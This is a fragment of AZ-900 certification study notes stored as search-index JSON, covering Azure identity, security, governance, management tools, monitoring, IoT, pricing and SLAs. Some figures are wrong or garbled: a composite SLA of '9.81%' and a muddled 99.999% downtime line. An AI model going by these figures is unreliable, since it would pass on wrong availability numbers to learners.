                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-conditional-access","title":"Azure conditional access","text":"

                            Conditional Access is a tool that Azure Active Directory uses to allow (or deny) access to resources based on identity signals. These signals include who the user is, where the user is, and what device the user is requesting access from. During sign-in, Conditional Access collects signals from the user, makes decisions based on those signals, and then enforces that decision by allowing or denying the access request or challenging for a multifactor authentication response.

                            Conditional Access is useful when you need to:

                            • Require multifactor authentication (MFA) to access an application depending on the requester\u2019s role, location, or network. For example, you could require MFA for administrators but not regular users or for people connecting from outside your corporate network.
                            • Require access to services only through approved client applications. For example, you could limit which email applications are able to connect to your email service.
                            • Require users to access your application only from managed devices. A managed device is a device that meets your standards for security and compliance.
                            • Block access from untrusted sources, such as access from unknown or unexpected locations.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-for-role-based-access-control-rbac","title":"Azure Resource Manager for role-based access control (RBAC)","text":"

                            Azure Resource Manager is a management service that provides a way to organize and secure your cloud resources.

                            Azure provides built-in roles that describe common access rules for cloud resources. You can also define your own roles.

                            Scopes include:

                            • A management group (a collection of multiple subscriptions).
                            • A single subscription.
                            • A resource group.
                            • A single resource.

                            Azure RBAC is hierarchical, in that when you grant access at a parent scope, those permissions are inherited by all child scopes. For example:

                            • When you assign the Owner role to a user at the management group scope, that user can manage everything in all subscriptions within the management group.
                            • When you assign the Reader role to a group at the subscription scope, the members of that group can view every resource group and resource within the subscription.

                            Azure RBAC is enforced on any action that's initiated against an Azure resource that passes through Azure Resource Manager. Resource Manager is a management service that provides a way to organize and secure your cloud resources.

                            You typically access Resource Manager from the Azure portal, Azure Cloud Shell, Azure PowerShell, and the Azure CLI.

                            Azure RBAC doesn't enforce access permissions at the application or data level. Application security must be handled by your application.

                            Azure RBAC uses an allow model. When you're assigned a role, Azure RBAC allows you to perform actions within the scope of that role. If one role assignment grants you read permissions to a resource group and a different role assignment grants you write permissions to the same resource group, you have both read and write permissions on that resource group.

                            You can have up to 2000 role assignments in each subscription.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#zero-trust-model","title":"Zero trust model","text":"

                            Traditionally, corporate networks were restricted, protected, and generally assumed safe. Only managed computers could join the network, VPN access was tightly controlled, and personal devices were frequently restricted or blocked.

                            The Zero Trust model flips that scenario. Instead of assuming that a device is safe because it\u2019s within the corporate network, it requires everyone to authenticate. Then grants access based on authentication rather than location.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#defense-in-depth","title":"Defense-in-depth","text":"

                            A defense-in-depth strategy uses a series of mechanisms to slow the advance of an attack that aims at acquiring unauthorized access to data.

                            This approach removes reliance on any single layer of protection. It slows down an attack and provides alert information that security teams can act upon, either automatically or manually.

                            Here's a brief overview of the role of each layer:

                            • The physical security layer is the first line of defense to protect computing hardware in the datacenter. Physically securing access to buildings and controlling access to computing hardware within the datacenter are the first line of defense.
                            • The identity and access layer controls access to infrastructure and change control. The identity and access layer is all about ensuring that identities are secure, that access is granted only to what's needed, and that sign-in events and changes are logged.
                            • The perimeter layer uses distributed denial of service (DDoS) protection to filter large-scale attacks before they can cause a denial of service for users. The network perimeter protects from network-based attacks against your resources. Identifying these attacks, eliminating their impact, and alerting you when they happen are important ways to keep your network secure. \u00a0DDoS protection + Firewalls.
                            • The network layer limits communication between resources through segmentation and access controls. - Limit communication between resources. - Deny by default. - Restrict inbound internet access and limit outbound access where appropriate. - Implement secure connectivity to on-premises networks.
                            • The compute layer secures access to virtual machines. - Secure access to virtual machines. - Implement endpoint protection on devices and keep systems patched and current.
                            • The application layer helps ensure that applications are secure and free of security vulnerabilities. - Store sensitive application secrets in a secure storage medium. - Make security a design requirement for all application development.
                            • The data layer controls access to business and customer data that you need to protect.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-defender-for-cloud","title":"Microsoft Defender for Cloud","text":"

                            Defender for Cloud is a monitoring tool for security posture management and threat protection. It monitors your cloud, on-premises, hybrid, and multi-cloud environments to provide guidance and notifications aimed at strengthening your security posture.

                            When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multi-cloud environments, Microsoft Defender plans are extended to non Azure machines with the help of Azure Arc. \u00a0Cloud security posture management (CSPM) features are extended to multi-cloud machines without the need for any agents.

                            Defender for Cloud helps you detect threats across:

                            • Azure PaaS services \u2013 Detect threats targeting Azure services. You can also perform anomaly detection on your Azure activity logs using the native integration with Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security).
                            • Azure data services \u2013 Defender for Cloud includes capabilities that help you automatically classify your data in Azure SQL.
                            • Networks \u2013 Defender for Cloud helps you limit exposure to brute force attacks. By reducing access to virtual machine ports, using the just-in-time VM access, you can harden your network by preventing unnecessary access.

                            Defender for Cloud can also protect resources in other clouds (such as AWS and GCP). For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

                            • Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and includes the results in the secure score. The resources will also be assessed for compliance with built-in standards specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multi-cloud enabled feature helping you manage your AWS resources alongside your Azure resources.
                            • Microsoft Defender for Containers extends its container threat detection and advanced defenses to your Amazon EKS Linux clusters.
                            • Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows and Linux EC2 instances.

                            Defender for Cloud \u00a0fills three vital needs:

                            • Continuously assess \u2013 Know your security posture. Identify and track vulnerabilities. Defender for cloud helps you continuously assess your environment. Defender for Cloud includes vulnerability assessment solutions for your virtual machines, container registries, and SQL servers. Microsoft Defender for servers includes automatic, native integration with Microsoft Defender for Endpoint.
                            • Secure: Harden resources and services with Azure Security Benchmark. In Defender for Cloud, you can set your policies to run on management groups, across subscriptions, and even for a whole tenant. Defender for Cloud assesses if new resources are configured according to security best practices. If not, they're flagged and you get a prioritized list of recommendations for what you need to fix. In this way, Defender for Cloud enables you not just to set security policies, but to apply secure configuration standards across your resources. To help you understand how important each recommendation is to your overall security posture, Defender for Cloud groups the recommendations into security controls and adds a secure score value to each control.
                            • Defend \u2013 Detect and resolve threats to resources, workloads, and services. When Defender for Cloud detects a threat in any area of your environment, it generates a security alert. Security alerts describe details of the affected resources, suggest remediation steps, and provide, in some cases, an option to trigger a logic app in response
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#governance-and-compliance-features-and-tools","title":"Governance and compliance: features and tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-purview","title":"Microsoft Purview","text":"

                            Microsoft Purview is a family of data governance, risk, and compliance solutions that helps you get a single, unified view into your data. Microsoft Purview brings insights about your on-premises, multicloud, and software-as-a-service data together. It provides:

                            • Automated data discovery
                            • Sensitive data classification
                            • End-to-end data lineage

                            Microsoft Purview risk and compliance solutions: Microsoft 365 features as a core component of the Microsoft Purview risk and compliance solutions. Microsoft Teams, OneDrive, and Exchange are just some of the Microsoft 365 services that Microsoft Purview uses to help manage and monitor your data.

                            Unified data governance: Microsoft Purview has robust, unified data governance solutions that help manage your on-premises, multicloud, and software as a service data. Microsoft Purview\u2019s robust data governance capabilities enable you to manage your data stored in Azure, SQL and Hive databases, locally, and even in other clouds like Amazon S3.

                            Microsoft Purview\u2019s unified data governance helps your organization:

                            • Create an up-to-date map of your entire data estate that includes data classification and end-to-end lineage.
                            • Identify where sensitive data is stored in your estate.
                            • Create a secure environment for data consumers to find valuable data.
                            • Generate insights about how your data is stored and used.
                            • Manage access to the data in your estate securely and at scale.

                            Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

                            • Incorrect: Data Catalog \u2013\u2013 This enables data discovery.
                            • Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations.
                            • Incorrect: Data Estate Insights \u2013\u2013 This accesses data estate health.
                            • Correct: Data Policy \u2013\u2013 This governs access to data.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-policy","title":"Azure Policy","text":"

                            Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit your resources.

                            Azure Policy enables you to define both individual policies and groups of related policies, known as initiatives. Azure Policy evaluates your resources and highlights resources that aren't compliant with the policies you've created. Azure Policy can also prevent noncompliant resources from being created.

                            Azure Policies can be set at each level, enabling you to set policies on a specific resource, resource group, subscription, and so on. Additionally, Azure Policies are inherited, so if you set a policy at a high level, it will automatically be applied to all of the groupings that fall within the parent.

                            Azure Policy comes with built-in policy and initiative definitions for Storage, Networking, Compute, Security Center, and Monitoring. In some cases, Azure Policy can automatically remediate noncompliant resources and configurations to ensure the integrity of the state of the resources. This applies, for example, in the tagging of resources. If you have a specific resource that you don\u2019t want Azure Policy to automatically fix, you can flag that resource as an exception.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-initiative-policies","title":"Azure initiative policies","text":"

                            An Azure Policy initiative is a way of grouping related policies together. The initiative definition contains all of the policy definitions to help track your compliance state for a larger goal. For instance, the Enable Monitoring in Azure Security Center initiative contains over 100 separate policy definitions. Its goal is to monitor all available security recommendations for all Azure resource types in Azure Security Center.

                            Under this initiative, the following policy definitions are included:

                            • Monitor unencrypted SQL Database in Security Center\u00a0This policy monitors for unencrypted SQL databases and servers.
                            • Monitor OS vulnerabilities in Security Center\u00a0This policy monitors servers that don't satisfy the configured OS vulnerability baseline.
                            • Monitor missing Endpoint Protection in Security Center\u00a0This policy monitors for servers that don't have an installed endpoint protection agent.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#resource-locks","title":"Resource locks","text":"

                            Resource locks prevent resources from being deleted or updated, depending on the type of lock. Resource locks can be applied to individual resources, resource groups, or even an entire subscription. Resource locks are inherited, meaning that if you place a resource lock on a resource group, all of the resources within the resource group will also have the resource lock applied.

                            There are two types of resource locks, one that prevents users from deleting and one that prevents users from changing or deleting a resource.

                            • Delete means authorized users can still read and modify a resource, but they can't delete the resource.
                            • ReadOnly means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

                            You can manage resource locks from the Azure portal, PowerShell, the Azure CLI, or from an Azure Resource Manager template. To view, add, or delete locks in the Azure portal, go to the Settings section of any resource's Settings pane in the Azure portal. To modify a locked resource, you must first remove the lock. After you remove the lock, you can apply any action you have permissions to perform. Resource locks apply regardless of RBAC permissions. Even if you're an owner of the resource, you must still remove the lock before you can perform the blocked activity.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-trust-portal","title":"Service Trust portal","text":"

                            The Microsoft Service Trust Portal is a portal that provides access to various content, tools, and other resources about Microsoft security, privacy, and compliance practices.

                            You can access the Service Trust Portal at\u00a0https://servicetrust.microsoft.com/.

                            The Service Trust Portal features and content are accessible from the main menu. The categories on the main menu are:

                            • Service Trust Portal\u00a0provides a quick access hyperlink to return to the Service Trust Portal home page.
                            • My Library\u00a0lets you save (or pin) documents to quickly access them on your My Library page. You can also set up to receive notifications when documents in your My Library are updated.
                            • All Documents\u00a0is a single landing place for documents on the service trust portal. From\u00a0All Documents, you can pin documents to have them show up in your\u00a0My Library.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#key-azure-management-tools","title":"Key Azure Management Tools","text":"

                            There are several tools at your disposal to manage Azure resources and environments. They include the Azure Portal, Azure PowerShell, Azure CLI, the Azure Mobile App, and ARM templates.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-portal","title":"Azure Portal","text":"

                            The Azure portal is a web-based user interface that you can use to access almost every feature of Azure. It can be used to visually understand and manage your Azure environment, while Azure PowerShell allows you to quickly perform one-off tasks and to script tasks as needed. Azure PowerShell is available for Windows, Linux, and Mac, and you can access it in a web browser via Azure Cloud Shell.

                            Azure Portal does not offer a way to automate repetitive tasks.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"

                            Browser-based scripting environment that is accessible from Azure Portal. It requires a storage account. It allows you to choose the shell experience that suits you best.

                            During AZ-900 preparation at Microsoft Learn platform, an Azure Cloud Shell is provided.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cli","title":"Azure CLI","text":"

                            Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

                            It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Launch azure cli:

                            # Launch Azure CLI interactive mode from Azure Cloud Shell\naz interactive\n\nversion\nupgrade\nexit\n

                            See cheat sheet for Azure CLI.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-powershell","title":"Azure PowerShell","text":"

                            Azure PowerShell is a shell with which developers, DevOps, and IT professionals can run commands called command-lets (cmdlets). These commands call the Azure REST API to perform management tasks in Azure.

                            In addition to be available via Azure Cloud Shell, you can install and configure Azure PowerShell on Windows, Linux, and Mac platforms.

                            See cheat sheet for Azure Powershell.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-arm-and-azure-arm-templates","title":"Azure Resource Manager (ARM) and Azure ARM templates","text":"

                            Azure Resource Manager (ARM) is the service used to provision resources in Azure (via the portal, Azure CLI, Terraform, etc.). A resource can be anything you provision inside an Azure subscription. Resources always belong to a Resource Group. Each type of resource (VM, Web App) is provisioned and managed by a Resource Provider (RP). There are close to two hundred RPs within the Azure platform today (and growing with the release of each new service).

                            Azure Arc takes the notion of the Resource Provider and extends it to resources outside of Azure. Azure Arc introduces a new Resource Provider (RP) called \u201cHybrid Compute\u201d. The HybridCompute RP is responsible for managing the resources outside of Azure. HybridCompute RP manages the external resources by connecting to the Azure Arc\u00a0agent, deployed to the external VM. Once we deploy the Azure Arc agent to a VM running, for instance, in Google Cloud, it shows inside Azure Portal within the resource group \u201caz_arc_rg\u201d. Since the Google Cloud hosted VM (gcp-vm-001) is an ARM resource, it is an object inside Azure AD. Furthermore, there can be a managed identity associated with Google VM.

                            With Azure Resource Manager, you can:

                            • Manage your infrastructure through declarative templates rather than scripts. A Resource Manager template is a JSON file that defines what you want to deploy to Azure.
                            • Deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
                            • Re-deploy your solution throughout the development life-cycle and have confidence your resources are deployed in a consistent state.
                            • Define the dependencies between resources, so they're deployed in the correct order.
                            • Apply access control to all services because RBAC is natively integrated into the management platform.
                            • Apply tags to resources to logically organize all the resources in your subscription.
                            • Clarify your organization's billing by viewing costs for a group of resources that share the same tag.

                            Infraestructure as code: ARM templates and Bicep are two examples of using infrastructure as code with the Azure Resource Manager to maintain your environment.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates_1","title":"ARM templates","text":"

                            By using ARM templates, you can describe the resources you want to use in a declarative JSON format. With an ARM template, the deployment code is verified before any code is run. This ensures that the resources will be created and connected correctly. The template then orchestrates the creation of those resources in parallel. Templates can even execute PowerShell and Bash scripts before or after the resource has been set up.

                            Benefits of using ARM templates:

                            • Declarative syntax: ARM templates allow you to create and deploy an entire Azure infrastructure declaratively.
                            • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
                            • Orchestration: You don't have to worry about the complexities of ordering operations and inter dependencies.
                            • Modular files: You can break your templates into smaller, reusable components and link them together at deployment time.
                            • Extensibility: With deployment scripts, you can add PowerShell or Bash scripts to your templates.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#biceps","title":"Biceps","text":"

                            Bicep is a language that uses declarative syntax to deploy Azure resources. A Bicep file defines the infrastructure and configuration. Then, ARM deploys that environment based on your Bicep file. While similar to an ARM template, which is written in JSON, Bicep files tend to use a simpler, more concise style.

                            Benefits of using Bicep files:

                            • Support for all resource types and API versions: Bicep immediately supports all preview and GA versions for Azure services.
                            • Simple syntax: When compared to the equivalent JSON template, Bicep files are more concise and easier to read. Bicep requires no previous knowledge of programming languages.
                            • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
                            • Orchestration: You don't have to worry about the complexities of ordering operations.
                            • Modularity: You can break your Bicep code into manageable parts by using modules.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-arc","title":"Azure Arc","text":"

                            Azure Arc is a bridge that extends the Azure platform to help you build applications and services with the flexibility to run across datacenters, at the edge, and in multicloud environments. Develop cloud-native applications with a consistent development, operations, and security model. Azure Arc runs on both new and existing hardware, virtualization and Kubernetes platforms, IoT devices, and integrated systems.

                            Azure Arc is not just a \u201csingle-pane\u201d of control for cloud and on-premises. Azure Arc takes Azure\u2019s all-important control plane \u2013 namely, the Azure Resource Manager (ARM) \u2013 and extends it outside of Azure. In order to understand the implication of the last statement, it will help to go over a few ARM terms.

                            In utilizing Azure Resource Manager (ARM), Arc lets you extend your Azure compliance and monitoring to your hybrid and multi-cloud configurations. Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform.

                            Azure Arc provides a centralized, unified way to:

                            • Manage your entire environment together by projecting your existing non-Azure resources into ARM.
                            • Manage multi-cloud and hybrid virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
                            • Use familiar Azure services and management capabilities, regardless of where they live.
                            • Continue using traditional ITOps while introducing DevOps practices to support new cloud and native patterns in your environment.
                            • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

                            Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

                            • Servers
                            • Kubernetes clusters
                            • Azure data services
                            • SQL Server
                            • Virtual machines (preview)
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitoring-tools","title":"Azure Monitoring tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor_1","title":"Azure Advisor","text":"

                            Azure Advisor evaluates your Azure resources and makes recommendations to help improve reliability, security, and performance, achieve operational excellence, and reduce costs. Azure Advisor is designed to help you save time on cloud optimization. The recommendation service includes suggested actions you can take right away, postpone, or dismiss.

                            The recommendations are divided into five categories:

                            • Reliability\u00a0is used to ensure and improve the continuity of your business-critical applications.
                            • Security\u00a0is used to detect threats and vulnerabilities that might lead to security breaches.
                            • Performance\u00a0is used to improve the speed of your applications.
                            • Operational Excellence\u00a0is used to help you achieve process and workflow efficiency, resource manageability, and deployment best practices.
                            • Cost\u00a0is used to optimize and reduce your overall Azure spending.

                            Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-service-health","title":"Azure Service Health","text":"

                            Microsoft Azure provides a global cloud solution to help you manage your infrastructure needs, reach your customers, innovate, and adapt rapidly. Azure Service Health helps you keep track of Azure resource, both your specifically deployed resources and the overall status of Azure. Azure service health does this by combining three different Azure services:

                            • Azure Status\u00a0 informs you of service outages in Azure on the Azure Status page. The page is a global view of the health of all Azure services across all Azure regions.
                            • Service Health\u00a0provides a narrower view of Azure services and regions. It focuses on the Azure services and regions you're using. This is the best place to look for service impacting communications about outages, planned maintenance activities, and other health advisories because the authenticated Service Health experience knows which services and resources you currently use. You can even set up Service Health alerts to notify you when service issues, planned maintenance, or other changes may affect the Azure services and regions you use.
                            • Resource Health\u00a0is a tailored view of your actual Azure resources. It provides information about the health of your individual cloud resources, such as a specific virtual machine instance. It helps to diagnose issues. You can obtain support when an Azure service issue affects your resources.

                            By using Azure status, Service health, and Resource health, Azure Service Health gives you a complete view of your Azure environment-all the way from the global status of Azure services and regions down to specific resources.

                            Something you initially thought was a simple anomaly that turned into a trend, can readily be reviewed and investigated thanks to the historical alerts.

                            Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor","title":"Azure Monitor","text":"

                            Azure Monitor is a platform for collecting data on your resources, analyzing that data, visualizing the information, and even acting on the results. Azure Monitor can monitor Azure resources, your on-premises resources, and even multi-cloud resources like virtual machines hosted with a different cloud provider.

                            Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

                            As soon as you create an Azure suscription and start deploying resources, Azure Monitor begins collecting data. Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling.

                            Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes? Azure monitor

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-log-analytics","title":"Azure Log Analytics","text":"

                            Azure Log Analytics is the tool in the Azure portal where you\u2019ll write and run log queries on the data gathered by Azure Monitor. Log Analytics is a robust tool that supports both simple, complex queries, and data analysis. You can write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze the records. You can write an advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend.

                            Activity Logs record when resources are created or modified.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor-alerts","title":"Azure Monitor Alerts","text":"

                            Azure Monitor Alerts are an automated way to stay informed when Azure Monitor detects a threshold being crossed. You set the alert conditions, the notification actions, and then Azure Monitor Alerts notifies when an alert is triggered. Depending on your configuration, Azure Monitor Alerts can also attempt corrective action.

                            Alerts can be set up to monitor the logs and trigger on certain log events, or they can be set to monitor metrics and trigger when certain metrics are crossed. Azure Monitor Alerts use action groups to configure who to notify and what action to take. An action group is simply a collection of notification and action preferences that you associate with one or multiple alerts.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#application-insights","title":"Application Insights","text":"

                            Application Insights, an Azure Monitor feature, monitors your web applications. Application Insights is capable of monitoring applications that are running in Azure, on-premises, or in a different cloud environment.

                            There are two ways to configure Application Insights to help monitor your application. You can either install an SDK in your application, or you can use the Application Insights agent. The Application Insights agent is supported in C#.NET, VB.NET, Java, JavaScript, Node.js, and Python.

                            Once Application Insights is up and running, you can use it to monitor a broad array of information, such as:

                            • Request rates, response times, and failure rates
                            • Dependency rates, response times, and failure rates, to show whether external services are slowing down performance
                            • Page views and load performance reported by users' browsers
                            • AJAX calls from web pages, including rates, response times, and failure rates
                            • User and session counts
                            • Performance counters from Windows or Linux server machines, such as CPU, memory, and network usage
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot","title":"Azure IoT","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-hub","title":"Azure IoT Hub","text":"

                            Azure IoT Hub is an Azure-hosted service that functions as a message hub for biderectional communications between the deployed IT devices and the Azure services. You can connect millions of devices and their backend solutions reliably and securely. Almost any device can be connected to an IoT hub.

                            Several messaging patterns are supported, including device-to-cloud telemetry, uploading files from devices, and request-reply methods to control your devices from the cloud. IoT Hub also supports monitoring to help you track device creation, device connections, and device failures.

                            IoT Hub can further route messages to\u00a0Azure Data Lake Storage.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-central","title":"Azure IoT Central","text":"

                            Built on the functios provided by IoT Hub, it provides visualization, control and management features for IoT devices. You can connect devices, view telemetry, view overall device performance, create and manage alerts or even push updates to devices.

                            IoT has device templates to facilitate management.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sphere","title":"Azure Sphere","text":"

                            Azure Sphere is an integrated IoT solution that consists of three key parts:

                            • Azure Sphere micro-controller units (MCUs): hardware component build into the IoT devices that processes the OS and signals from attached sensors.
                            • Management software: a custom Linux operating system that manages communication with the security service and runs the vendor's device software.
                            • Azure Sphere Security Service (AS3): handles certificate-based device authentication to Azure, ensures that the device has not been compromised, and pushes OS and other software updates to the device as needed.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-artificial-intelligence","title":"Azure Artificial Intelligence","text":"

                            AI falls into two broad categories: deep learning and machine learning.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-machine-learning","title":"Azure Machine Learning","text":"

                            Collection of Azure services and tools that enable you to use data to train and validate models. It provides multiple services and features such as: Azure Machine Learning Studio, a web portal through which developers ca create no-code and code-first solutions.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cognitive-services","title":"Azure Cognitive Services","text":"

                            Azure Cognitive Services provides machine learning models to interact with human and execute cognitive functions that humans would normally do: language, speech, vision, decision.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-bot-service","title":"Azure Bot Service","text":"

                            Azure Bot Service enables you to create and use virtual agents to interact with users.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops","title":"Azure DevOps","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops-services","title":"Azure DevOps Services","text":"

                            This is not a single but rather a group of services:

                            • Azure Artifects
                            • Azure Boards
                            • Azure Pipelines
                            • Azure Repos
                            • Azure Test Plans
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#github-and-github-actions","title":"GitHub and GitHub Actions","text":"

                            GitHub and GitHub Actions offer many of the same functions as Azure DevOps Services. Generally speaking, GitHub is the appropriate choice for collaborating on open source projects and DevOps is the appropriate choice for enterprise/internal projects.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devtest-labs","title":"Azure DevTest Labs","text":"

                            Azure DevTest Labs automates the deployment, configuration, and decommissioning of VMs and other Azure resources.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-for-defense","title":"Azure for defense","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-firewall","title":"Azure Firewall","text":"

                            Azure Firewall allows you to centrally create, enforce, and log application and network connectivity policies across subscriptions and virtual networks

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ddos-protection","title":"Azure DDoS Protection","text":"

                            Azure DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sentinel","title":"Azure Sentinel","text":"

                            SIEM + SOAR

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-pricing-service-level-agreements-and-lifecycle","title":"Azure Pricing, Service Level Agreements, and Lifecycle","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing","title":"Pricing","text":"

                            There are free and paid subscriptions:

                            • Free trial: 12 months of select free services. Credit of $200 (September 2023) to use any Azure service for 30 days. Services are disabled when time or credit expire. Convertible to paid subscriptions.
                            • Pay-as-you-go: typical consumption cloud model.
                            • Member offers: Some products or services provide credits toward Azure Services.

                            Subscriptions don't enable you to access Azure service per se. For that matter, you need to purchase service through:

                            • Enterprise agreement.
                            • Web Direct.
                            • Cloud Solution Provider (or CSP).

                            If you want to raise the limit or quota above the default limit, \"open an online customer support request at no charge\". (Correct)

                            Billing zone: Geographical grouping of Azure regions for billing Azure resources.

                            Tools: Azure Advisor

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-level-agreements","title":"Service Level Agreements","text":"

                            A Service Level Agreement (SLA) is an agreement between a service provider and a consumer that generally guarantees that the SLA-backed service will be available for a specific period during the month. 99% SLA -> 07.20 hours 99.90% SLA -> 00 hours 43.20 minutes 99.95% SLA -> 00 hours 21.60 minutes 99.99% SLA -> 00 hours 04.32 minutes 99.999% SLA ->00 hours 00.00 minutes 25.9 seconds

                            A key point: If an Azure service is available but with degraded performance, it still meets the SLA. The service must be completely unavailable to fail the SLA and qualify for a service credit.

                            In addition to having different SLA, each Azure resource has also their service credits. Generally, the higher the SLA, the lower the service credit will be.

                            SIE is the acronym for Service Impacting Event.

                            Composite SLA is the SLA that results from combining services with potentially different SLAs. To determine the composite SLA, you simply multiply the SLA values for each resource.

                            Tip for the exam: Deploying instances of a VM across two or more availability zones raises the SLA for the VM from a 99.9% to 99.99% while launching 2 VM instances with a load balancer gives a composite SLA of 9.81%.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-lifecycle-in-azure","title":"Service Lifecycle in Azure","text":"

                            Previews allows you to test a pre-release version of your service. Previews have their own terms and conditions. Some of them don't even have customer support at all. Even though you may see a service on a preview, that doesn't mean that is ready for a production environment.

                            • Private Preview: Azure feature available to ** certain Azure customers** for evaluation purposes.
                            • Public Preview: Azure feature available to all Azure customers for evaluation purposes. Accessible from the Azure Portal.

                            Access to preview features at the Azure Portal Preview

                            General availability means that the service, application, or feature is available for all Azure customers. In modern lifecycle

